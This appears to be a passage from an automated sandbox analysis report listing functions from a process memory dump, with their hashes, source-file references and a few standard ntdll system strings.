Opcode Fuzzy Hash: b027346e3b4cadc20c77319fbe7d1c15d02376f01dc67c537390e77754983c1a
Instruction Fuzzy Hash: 5190023124184442D581B2994A05B0F410587E1202FA5D01DA4156554CC91689569721

Function 02EB4650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c66c95b22203ef07fd4bb25f3e8e0081a7818dc164fafcd7675b33ec2c0cfa9
Instruction ID: abf6499ac4e6803da030e1cbb2605f743152e093e8988d4af1fe874af670b155
Opcode Fuzzy Hash: 1c66c95b22203ef07fd4bb25f3e8e0081a7818dc164fafcd7675b33ec2c0cfa9
Instruction Fuzzy Hash: 20900271641500424581B1994A05407600597E13013A5D119A0554560C86198956D269

Function 02EB2AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b83a613da759510f7931a97f03ba7d2397f3003f9a06de8061c36772eda5d76d
Instruction ID: ee6fc1b9eafc91727da4a31cafbccc77f3dafeed4e2584eb3ecd07062edbebd2
Opcode Fuzzy Hash: b83a613da759510f7931a97f03ba7d2397f3003f9a06de8061c36772eda5d76d
Instruction Fuzzy Hash: ED900235261400020586F599070550B044597D63513A5D019F1416590CC62289669321

Function 02EB2AD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb19c60b90daa9d477a0c0b9d0768941a15a241cec32a15a101ad78fcbc740e4
Instruction ID: c349bdfb09521d267b77319481eb4d651e160a551c907160c6e02549b204abfa
Opcode Fuzzy Hash: eb19c60b90daa9d477a0c0b9d0768941a15a241cec32a15a101ad78fcbc740e4
Instruction Fuzzy Hash: 74900435351400030547F5DD07055070047C7D5351375D035F1015550CD733CD73D131

Function 02EB2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862fdc27d31f5099931f9f5c3feb703d6d3a8ad920f30444811065afd3060ebd
Instruction ID: c55b815031a76678a0592fffe234839a14b24ddb114902ee1b038a09113876f5
Opcode Fuzzy Hash: 862fdc27d31f5099931f9f5c3feb703d6d3a8ad920f30444811065afd3060ebd
Instruction Fuzzy Hash: E29002B1241540924941F2998605B0B450587E0201B65D01AE1054560CC5268952D135

Function 02EB2BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19b039b2a628d1a9a789485161a33aa6e0c05781514135dfdbe9f2a62de78bc6
Instruction ID: 703e006dde25955771e714cf505055369f4d329fb7c059ff02a108a646e1f81a
Opcode Fuzzy Hash: 19b039b2a628d1a9a789485161a33aa6e0c05781514135dfdbe9f2a62de78bc6
Instruction Fuzzy Hash: 5B90023124544842D581B1994605A47001587D0305F65D015A0064694D96268E56F661

Function 02EB2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5104955b33175fab966a931e813573c52b5ab2e5abb64a6380d55b0bca82c90c
Instruction ID: 866c87deb95d7f4480c9ce3fbbf71aaf843c2982a2463b34972326ea5b489684
Opcode Fuzzy Hash: 5104955b33175fab966a931e813573c52b5ab2e5abb64a6380d55b0bca82c90c
Instruction Fuzzy Hash: EC90023124140802D5C1B199460564B000587D1301FA5D019A0025654DCA168B5AB7A1

Function 02EB2BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20d938d222b46e1bb7bacb13c9d218e4fc5e640981f601f30837a134f1ed95ed
Instruction ID: db74f1694ce9bb2653a513b36103d8d25b70e827e9c30bbda2083ef2a4b45b29
Opcode Fuzzy Hash: 20d938d222b46e1bb7bacb13c9d218e4fc5e640981f601f30837a134f1ed95ed
Instruction Fuzzy Hash: 4B90023164540802D591B1994615747000587D0301F65D015A0024654D87568B56B6A1

Function 02EB2B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85ea9d54b16bfaf04e6978218018390dd5a9ee1875b4017bc53daa0706d9888f
Instruction ID: 4285eb6ad741232f27fd4c0bfb21b05ec34aa479ffe6dbb5813620d09d06eb6c
Opcode Fuzzy Hash: 85ea9d54b16bfaf04e6978218018390dd5a9ee1875b4017bc53daa0706d9888f
Instruction Fuzzy Hash: D490023124140802D545B1994A05687000587D0301F65D015A6024655E96668992B131

Function 02EB39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64083c4c9e30d830ae8660a8c1ff6c2457d0af8119b8b84f79a0641858d80d01
Instruction ID: 08d45ad1a328f1eabf9218ab4d9f03d40a23810d0198f87d0955891b6bf22697
Opcode Fuzzy Hash: 64083c4c9e30d830ae8660a8c1ff6c2457d0af8119b8b84f79a0641858d80d01
Instruction Fuzzy Hash: C690023128545102D591B19D46056174005A7E0201F65D025A0814594D85568956A221

Function 02EB2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8071a95de88f86e565fd6b3f91802d4151669f15b5d2bc814bde7c3d5209ca2
Instruction ID: d942a538c59b26a523a591a0336f9c8caaba56b62a30936266e81d493fa582b6
Opcode Fuzzy Hash: a8071a95de88f86e565fd6b3f91802d4151669f15b5d2bc814bde7c3d5209ca2
Instruction Fuzzy Hash: 0E90027124180403D581B5994A05607000587D0302F65D015A2064555E8A2A8D52A135

Function 02EB2EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f61e7ffd58447235bad522136ab457d1b6fa17985fe895ab7672c21ce2928d5
Instruction ID: 642903575e26c0772c978e9c340e70a0366e52bee5d7343a2312338b3a4f56d3
Opcode Fuzzy Hash: 6f61e7ffd58447235bad522136ab457d1b6fa17985fe895ab7672c21ce2928d5
Instruction Fuzzy Hash: 6790027124140402D581B1994605747000587D0301F65D015A5064554E865A8ED6A665

Function 02EB2E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f5cd366e8ffc009f1e99911d731833145e91eae1c103ec4e6bf60f9f5d53694
Instruction ID: beb936ff171c59fb2d533193ae3beb9a9103fe11df012cb90a12476eee33f03e
Opcode Fuzzy Hash: 2f5cd366e8ffc009f1e99911d731833145e91eae1c103ec4e6bf60f9f5d53694
Instruction Fuzzy Hash: A890023164140502D542B1994605617000A87D0241FA5D026A1024555ECA268A93E131

Function 02EB2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ef2cabb16a5105e63676190c18b2537c35bfbc4ea0e949db32cd02805cd3aff
Instruction ID: 4f5e623494bc1bf780e4d179d5f93448b3cf894823341eb78439c82daddf48c4
Opcode Fuzzy Hash: 9ef2cabb16a5105e63676190c18b2537c35bfbc4ea0e949db32cd02805cd3aff
Instruction Fuzzy Hash: C890023134140402D543B19946156070009C7D1345FA5D016E1424555D86268A53E132

Function 02EB2FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f32f20ccaa2524008e5b6387c975a36b2fc17da518ccb3192150584ed5eaedef
Instruction ID: 0f50babd479c80d83fe4a56bc57c43d2bfdc9e94e8bc037a2df0cd0516815814
Opcode Fuzzy Hash: f32f20ccaa2524008e5b6387c975a36b2fc17da518ccb3192150584ed5eaedef
Instruction Fuzzy Hash: A8900231251C0042D641B5A94E15B07000587D0303F65D119A0154554CC91689629521

Function 02EB2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27e8ad2e3d3905c1ccef881535e337ae0a067575acbc31eb6904627d86b110bc
Instruction ID: f0580611a7f289fc5756c19232cb992b36556df09a5a06fce98648623bf462cd
Opcode Fuzzy Hash: 27e8ad2e3d3905c1ccef881535e337ae0a067575acbc31eb6904627d86b110bc
Instruction Fuzzy Hash: C090023124180402D541B1994A09747000587D0302F65D015A5164555E8666C992A531

Function 02EB2FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d31f0d206b5fd59311fc0ec3a4b9daedf519ad9713344ac155aab7d0ade2a516
Instruction ID: 3dc6f448cae05470a4513c790f0234bdd7767cd2cef78344ce73685f8cbe0370
Opcode Fuzzy Hash: d31f0d206b5fd59311fc0ec3a4b9daedf519ad9713344ac155aab7d0ade2a516
Instruction Fuzzy Hash: EA900231641400424581B1A98A459074005ABE1211765D125A0998550D855A89669665

Function 02EB2F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0ebaba2f2eaaca2ebc5034df6f10876d55225b9b4e9f070d8a9aacffbaad623
Instruction ID: fb933f9ab767582f0f43a2031a805ce9704ae3df4b1cd9a6edabea5f0216add7
Opcode Fuzzy Hash: a0ebaba2f2eaaca2ebc5034df6f10876d55225b9b4e9f070d8a9aacffbaad623
Instruction Fuzzy Hash: 7A90023124180402D541B1994A1570B000587D0302F65D015A1164555D86268952A571

Function 02EB2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 914b24497e361435ebfb1f8bca3cdb4ee9b1a63485caf5e4c4300602600392df
Instruction ID: 80d6d29217d2dca37ba0b2a2c8c5acb746f442c8d6b0b1bddfc20d54da1c36f5
Opcode Fuzzy Hash: 914b24497e361435ebfb1f8bca3cdb4ee9b1a63485caf5e4c4300602600392df
Instruction Fuzzy Hash: 3E90027125140042D545B1994605707004587E1201F65D016A2154554CC52A8D629125

Function 02EB2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52d1788dc50d461fb9ea379b46477d7169f4c32553dfd19dc69eb2f478fa5966
Instruction ID: 9d8e56879b9c8961a2b8b2c3d77353c559c5b7199a3dde5abe6d8d6c46ba019b
Opcode Fuzzy Hash: 52d1788dc50d461fb9ea379b46477d7169f4c32553dfd19dc69eb2f478fa5966
Instruction Fuzzy Hash: 0590027138140442D541B1994615B070005C7E1301F65D019E1064554D861ACD53A126

Function 02EB2CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1742569be142dc4c9df1ca2036ff34936291bb56a61ee170128777d9cf51ec9c
Instruction ID: 77f7b83e44273a86062a6bc5e7693fc9612790bf5ce496d8e737e4700d878667
Opcode Fuzzy Hash: 1742569be142dc4c9df1ca2036ff34936291bb56a61ee170128777d9cf51ec9c
Instruction Fuzzy Hash: 9090023124140403D541B1995709707000587D0201F65E415A0424558DD6578952A121

Function 02EB2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deba59b0c3195ef21116e45ff3927e8d4f1f459ef1657c0e757707ce2a35c986
Instruction ID: 6d1bb26902f8d452bf2bafb621b4292ac2b44620f13c0860fad6573d408109bd
Opcode Fuzzy Hash: deba59b0c3195ef21116e45ff3927e8d4f1f459ef1657c0e757707ce2a35c986
Instruction Fuzzy Hash: 7190023164540402D581B1995619707001587D0201F65E015A0024554DC65A8B56A6A1

Function 02EB2CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dadb3a3f5bc8db7d085ae42b523b69f6b2aad10aeb12af1a18128bd812fc4b3
Instruction ID: 822d0969fee667f678567e9e2f20b27d885eeb24dce68ff470b0550aaf5e7cec
Opcode Fuzzy Hash: 0dadb3a3f5bc8db7d085ae42b523b69f6b2aad10aeb12af1a18128bd812fc4b3
Instruction Fuzzy Hash: 5390023124140402D541B5D95609647000587E0301F65E015A5024555EC6668992A131

Function 02EB2C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6ba16a6303d04d2bd313e2bce2924607ec9736700282c71b2d96aa1217c0da8
Instruction ID: 52a0e6c35ca16f53983add453275bf3db4109b8b0780019d1658eaf2819885bf
Opcode Fuzzy Hash: d6ba16a6303d04d2bd313e2bce2924607ec9736700282c71b2d96aa1217c0da8
Instruction Fuzzy Hash: C090023124140842D541B1994605B47000587E0301F65D01AA0124654D8616C952B521

Function 02EB2DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a2b94d1ccad75a7eecf358eb2ded32f79cf1b4c2a078d9ff5fef1ac55dd288f
Instruction ID: 4629551d504570b6c47dd78f6ea93ab4fc1258af415f24cd3d622bea78f5f840
Opcode Fuzzy Hash: 9a2b94d1ccad75a7eecf358eb2ded32f79cf1b4c2a078d9ff5fef1ac55dd288f
Instruction Fuzzy Hash: 85900231282441525986F1994605507400697E02417A5D016A1414950C85279957D621

Function 02EB2DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d56e6fdd5d5f66c358dcc9547edb349f210bb44e9aec7113e877f6d9e32d0a
Instruction ID: fd8f02c969779cf4788aab2986cf2d827ba060ffae4925cfcdd129e80d91ef6b
Opcode Fuzzy Hash: 47d56e6fdd5d5f66c358dcc9547edb349f210bb44e9aec7113e877f6d9e32d0a
Instruction Fuzzy Hash: 4090023128140402D582B1994605607000997D0241FA5D016A0424554E86568B57EA61

Function 02EB3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d4024660d0b9cb3033aaef5dee8be30a6aadd267993182898e28a42e0edc5f
Instruction ID: 5e4fc3e78940535f5fe1e9548fde3ef88a065a3804202a8694d26030529fd5c1
Opcode Fuzzy Hash: c0d4024660d0b9cb3033aaef5dee8be30a6aadd267993182898e28a42e0edc5f
Instruction Fuzzy Hash: AE90023524140402D951B1995A05647004687D0301F65E415A0424558D865589A2E121

Function 02EB2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc5a62672de78046ade18d6b44633d4242f980ef29353678d523fcf59df1791a
Instruction ID: d76a4c6a9a24cda58f9f5e5eb07a9ae2b7e63a8cf7b977ac6b6d96f975078ce8
Opcode Fuzzy Hash: dc5a62672de78046ade18d6b44633d4242f980ef29353678d523fcf59df1791a
Instruction Fuzzy Hash: C290023134140003D581B19956196074005D7E1301F65E015E0414554CD91689579222

Function 02EB2D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81fe303aa7e1f5ffa71f586e3b5fe99e3ac56449359c960106b2fdb4dc136ca6
Instruction ID: c06c939e7b4f0dc0c40de81ec04f8c511826250158a3fbc33c7c3177cd078584
Opcode Fuzzy Hash: 81fe303aa7e1f5ffa71f586e3b5fe99e3ac56449359c960106b2fdb4dc136ca6
Instruction Fuzzy Hash: 2290023124544442D541B5995609A07000587D0205F65E015A1064595DC6368952E131

Function 02EB2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cbc210786e95c0e93518d6fccc887ca1111c5ea3d4d2f2603cc03e68fe04b29
Instruction ID: 50e48605695abcea60aaeb60c1768fe663f1bdbf32b0be1223def4b921071ae8
Opcode Fuzzy Hash: 1cbc210786e95c0e93518d6fccc887ca1111c5ea3d4d2f2603cc03e68fe04b29
Instruction Fuzzy Hash: 6E90023925340002D5C1B199560960B000587D1202FA5E419A0015558CC916896A9321

Function 02EB3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d684ba2d1a5aaabdce1b9fc7bda046340b5eea0f98c08825be7d6d473949609
Instruction ID: 59ebcdc9c89fdcacac241532fc8ad30002cbca845afa38a69a4c0b9205ff6a23
Opcode Fuzzy Hash: 3d684ba2d1a5aaabdce1b9fc7bda046340b5eea0f98c08825be7d6d473949609
Instruction Fuzzy Hash: E5900231242401429981B2995A05A4F410587E1302BA5E419A0015554CC91589629221

Function 02EB2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: a952236126db3a1231709c519553f72eb8e4bae0352f8989800c72334b76403d
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 02EB2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02EB293C
___swprintf_l.LIBCMT ref: 02EB295E
___swprintf_l.LIBCMT ref: 02EB29A3
___swprintf_l.LIBCMT ref: 02EEA52E

Strings

::%hs%u.%u.%u.%u, xrefs: 02EEA527
:%u.%u.%u.%u, xrefs: 02EEA5B8
ffff:, xrefs: 02EEA504
::ffff:0:%u.%u.%u.%u, xrefs: 02EEA54E

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: ce80d041c1886705d059c2a586d6caf15eadc656c0e4ed672037fa903b6de4a1
Instruction ID: 95b29a918f0d79b16d0d26a7f487efc492702dd50d227b67222e0375363fbaa5
Opcode Fuzzy Hash: ce80d041c1886705d059c2a586d6caf15eadc656c0e4ed672037fa903b6de4a1
Instruction Fuzzy Hash: C451E6B2A80116AFDF11DB98C8909BFF7B8BF08204750E569E96AD7641D334DE04CBE0

Function 02EA7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 02EE46A0
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02EE4725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02EE4742
CLIENT(ntdll): Processing section info %ws..., xrefs: 02EE4787
Execute=1, xrefs: 02EE4713
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02EE46FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02EE4655

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: e7d626cc87985eb3fa9b1579ad8f2fa1eec93350b1b18580c06d7bfd214f14fe
Instruction ID: cc62b6683116f40d1d9a7b01e61851f30c9de288cd624564d5189eccb14d5fc5
Opcode Fuzzy Hash: e7d626cc87985eb3fa9b1579ad8f2fa1eec93350b1b18580c06d7bfd214f14fe
Instruction Fuzzy Hash: F8511A316C02196AEF11EBA8DC65BEEB7B9EF44308F04A099E505AF1D1E771AA41CF50

Function 02EBB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02EBB6BF

Strings

-, xrefs: 02EBB650
+, xrefs: 02EBB65A
0, xrefs: 02EBB66F
0, xrefs: 02EBB695

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 5c5648c6b75dd59cf7944b3c1b1c01a9482520f66710b98833fa995790ae05d9
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 2A81C170E852599EDF268E68C8917FFBBB2AF4531CF18E25EEC51A7694C7348840CB50

Function 02E9F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02EE02E7
RTL: Re-Waiting, xrefs: 02EE031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02EE02BD

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 5bb3644ebe6ddff7591365fc81c2528914edf469a9ec0684d27c57782885d3da
Instruction ID: 86e7eb4b8f277d1bb5ef93f791adb8c2e3277556f725338ff019220e9348979c
Opcode Fuzzy Hash: 5bb3644ebe6ddff7591365fc81c2528914edf469a9ec0684d27c57782885d3da
Instruction Fuzzy Hash: F9E1F0306887419FDB21CF28C884B6AB7E1BF88318F149A1EF5A6DB6D1D774D844CB42

Function 02EABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

